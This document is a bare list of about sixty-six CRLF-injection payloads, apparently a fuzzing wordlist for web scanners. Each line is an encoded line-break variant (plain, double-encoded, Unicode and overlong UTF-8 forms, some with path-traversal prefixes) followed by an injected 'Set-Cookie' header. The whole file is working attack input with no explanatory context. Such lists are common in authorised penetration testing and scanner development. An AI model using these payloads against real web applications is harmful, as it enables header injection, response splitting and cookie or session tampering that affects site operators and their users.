%0aSet-Cookie:crlf=injection
%0dSet-Cookie:crlf=injection
%250aSet-Cookie:crlf=injection
%0a%0dSet-Cookie:crlf=injection
%0aSet-Cookie:%20crlf=injection
%0d%0aSet-Cookie:crlf=injection
%0dSet-Cookie:%20crlf=injection
%3f%0dSet-Cookie:crlf=injection
%23%0aSet-Cookie:crlf=injection
%23%0dSet-Cookie:crlf=injection
%%0a0aSet-Cookie:crlf=injection
%u000aSet-Cookie:crlf=injection
%25%30aSet-Cookie:crlf=injection
%25250aSet-Cookie:crlf=injection
%250aSet-Cookie:%20crlf=injection
%0a%0dSet-Cookie:%20crlf=injection
%0A%20%0ASet-Cookie:crlf=injection
%0d%0aSet-Cookie:%20crlf=injection
%3f%0d%0aSet-Cookie:crlf=injection
%3f%0dSet-Cookie:%20crlf=injection
%23%0aSet-Cookie:%20crlf=injection
%23%0d%0aSet-Cookie:crlf=injection
%23%0dSet-Cookie:%20crlf=injection
%25%30%61Set-Cookie:crlf=injection
%%0a0aSet-Cookie:%20crlf=injection
%E5%98%8ASet-Cookie:crlf=injection
%E5%98%8DSet-Cookie:crlf=injection
%u000aSet-Cookie:%20crlf=injection
%25%30aSet-Cookie:%20crlf=injection
%25250aSet-Cookie:%20crlf=injection
%2F..%0d%0aSet-Cookie:crlf=injection
%0A%20%0ASet-Cookie:%20crlf=injection
%3f%0d%0aSet-Cookie:%20crlf=injection
%3f%E5%98%8DSet-Cookie:crlf=injection
%23%0d%0aSet-Cookie:%20crlf=injection
%23%E5%98%8ASet-Cookie:crlf=injection
%23%E5%98%8DSet-Cookie:crlf=injection
%25%30%61Set-Cookie:%20crlf=injection
%%E5%98%8A0aSet-Cookie:crlf=injection
%E5%98%8ASet-Cookie:%20crlf=injection
%E5%98%8DSet-Cookie:%20crlf=injection
%2F..%0d%0aSet-Cookie:%20crlf=injection
%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
%3f%E5%98%8DSet-Cookie:%20crlf=injection
%23%E5%98%8ASet-Cookie:%20crlf=injection
%23%E5%98%8DSet-Cookie:%20crlf=injection
%%E5%98%8A0aSet-Cookie:%20crlf=injection
%2e%2e%2f%0d%0aSet-Cookie:%20crlf=injection
%2f%2e%2e%0d%0aSet-Cookie:%20crlf=injection
%E5%98%8A%E5%98%8DSet-Cookie:crlf=injection
%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%3f%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%23%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%E5%98%8A%20%E5%98%8ASet-Cookie:crlf=injection
%E5%98%8A%E5%98%8DSet-Cookie:%20crlf=injection
%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection
%2F..%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%3f%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection
%23%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection
%E5%98%8A%20%E5%98%8ASet-Cookie:%20crlf=injection
%2F..%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection
%2e%2e%2f%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%2f%2e%2e%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
%2e%2e%2f%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection
%2f%2e%2e%E5%98%8D%E5%98%8ASet-Cookie:%20crlf=injection